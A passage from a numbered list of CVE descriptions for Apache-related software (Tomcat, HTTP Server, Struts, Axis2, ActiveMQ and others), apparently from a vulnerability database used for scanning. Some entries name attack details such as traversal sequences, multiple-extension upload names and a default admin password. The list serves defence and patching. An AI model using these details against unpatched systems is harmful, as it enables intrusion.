8837| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
8838| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
8839| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
8840| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
8841| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
8842| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
8843| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
8844| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
8845| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
8846| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
8847| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
8848| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
8849| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
8850| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
8851| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
8852| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
8853| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
8854| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
8855| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
8856| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
8857| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
8858| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
8859| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
8860| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
8861| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
8862| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
8863| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
8864| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
8865| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
8866| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
8867| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
8868| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
8869| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
8870| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
8871| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
8872| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
8873| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
8874| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
8875| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
8876| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
8877| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
8878| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
8879| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
8880| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
8881| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
8882| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
8883| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
8884| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
8885| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
8886| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
8887| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
8888| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
8889| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
8890| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
8891| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
8892| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
8893| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
8894| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
8895| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
8896| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
8897| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
8898| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
8899| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
8900| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
8901| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
8902| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
8903| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
8904| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
8905| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
8906| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
8907| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
8908| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
8909| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
8910| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
8911| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
8912| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
8913| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
8914| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
8915| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
8916| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
8917| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
8918| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
8919| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
8920| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
8921| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
8922| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
8923| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
8924| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
8925| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
8926| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
8927| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
8928| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
8929| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
8930| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
8931| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
8932| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
8933| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
8934| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
8935| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
8936| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
8937| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
8938| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
